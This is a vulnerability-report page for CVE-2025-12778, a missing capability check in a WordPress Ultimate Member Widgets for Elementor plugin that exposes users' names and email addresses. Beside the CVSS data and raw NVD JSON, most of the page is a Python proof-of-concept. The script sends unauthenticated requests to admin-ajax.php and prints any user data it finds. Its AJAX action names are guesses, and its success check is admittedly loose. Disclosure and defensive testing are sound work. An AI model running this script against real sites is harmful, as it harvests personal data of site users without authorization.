Security Vulnerability Report
CVE-2025-12778 CVSS 5.3 MEDIUM

CVE-2025-12778

Published: 2025-11-20 15:17:23
Last Modified: 2026-04-15 00:35:42

Description

The Ultimate Member Widgets for Elementor – WordPress User Directory plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the handle_filter_users function in all versions up to, and including, 2.3. This makes it possible for unauthenticated attackers to extract partial metadata of all WordPress users, including their first name, last name and email addresses.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Ultimate Member Widgets for Elementor <= 2.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
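# CVE-2025-12778 PoC - Unauthorized User Metadata Access
# Target: WordPress with Ultimate Member Widgets for Elementor <= 2.3
import requests
import json
import sys


def exploit_cve_2025_12778(target_url, *, verify_tls=True):
    """Probe a site for CVE-2025-12778 (missing capability check in handle_filter_users).

    Sends unauthenticated POST requests to the site's admin-ajax.php, one per
    candidate AJAX action name, and stops at the first response that looks
    like it carries user data.

    Args:
        target_url: Base URL of the WordPress site; a trailing slash is stripped.
        verify_tls: Passed to ``requests`` as ``verify``. Certificate
            validation is on by default so the verdict is tied to the host
            that was actually named; pass ``False`` only for a lab host with
            a self-signed certificate.

    Returns:
        The parsed JSON body or the raw response text of the first response
        that matched the heuristic, or ``None`` when no candidate matched.
    """
    target = target_url.rstrip('/')

    # AJAX endpoint - typical WordPress admin-ajax.php location
    ajax_url = f"{target}/wp-admin/admin-ajax.php"

    # The exact action name depends on the plugin's registered AJAX hook.
    # These are guessed patterns, not names confirmed against the plugin
    # source, so "no hit" does not prove a site is patched.
    candidate_actions = (
        "um_elementor_filter_users",
        "handle_filter_users",
        "um_get_users",
    )

    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
    }

    print(f"[*] Target: {target}")
    print("[*] CVE-2025-12778 - Missing Capability Check in Ultimate Member Widgets")
    print("=" * 60)

    for action in candidate_actions:
        try:
            print(f"\n[*] Testing action: {action}")

            # No cookies or nonce are sent: the request is unauthenticated.
            data = {
                "action": action,
                "filter_type": "all",
                "page": 1
            }

            response = requests.post(
                ajax_url,
                data=data,
                headers=headers,
                timeout=10,
                verify=verify_tls
            )

            if response.status_code == 200:
                try:
                    json_response = response.json()
                except ValueError:
                    # Body is not JSON (requests raises a ValueError subclass);
                    # fall back to a substring check on the raw text.
                    # NOTE(review): "user" matches many unrelated pages, so a
                    # hit here is a lead to confirm, not proof.
                    body = response.text.lower()
                    if "email" in body or "user" in body:
                        print("[!] VULNERABLE! Found user data in response")
                        # The preview is raw response content and can include
                        # names and e-mail addresses.
                        print(f"[+] Response preview: {response.text[:500]}")
                        return response.text
                else:
                    # NOTE(review): any JSON containing "data" matches, which
                    # presumably includes WordPress JSON error envelopes;
                    # confirm a hit by inspecting the body.
                    if json_response and 'data' in str(json_response).lower():
                        print(f"[!] VULNERABLE! Found user data with action: {action}")
                        print(f"[+] Response preview: {str(json_response)[:500]}")
                        return json_response

            print(f"[-] Action {action} did not return user data")

        except requests.exceptions.RequestException as e:
            # Covers connection errors, timeouts and TLS validation failures.
            print(f"[-] Error with {action}: {e}")

    print("\n[*] Manual verification may be required")
    print("[*] Check the plugin's source code for the correct AJAX action name")
    return None


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve_2025_12778_poc.py <target_url>")
        print("Example: python cve_2025_12778_poc.py http://target-site.com")
        sys.exit(1)

    target_url = sys.argv[1]
    result = exploit_cve_2025_12778(target_url)

    if result:
        print("\n[+] Exploitation successful - user metadata extracted")
    else:
        print("\n[-] Exploitation failed or target not vulnerable")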

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12778", "sourceIdentifier": "[email protected]", "published": "2025-11-20T15:17:23.450", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Ultimate Member Widgets for Elementor – WordPress User Directory plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the handle_filter_users function in all versions up to, and including, 2.3. This makes it possible for unauthenticated attackers to extract partial metadata of all WordPress users, including their first name, last name and email addresses."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3397029/ultimate-member-widgets-for-elementor", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a917a24b-09cc-48e9-844a-e1ed573a708f?source=cve", "source": "[email protected]"}]}}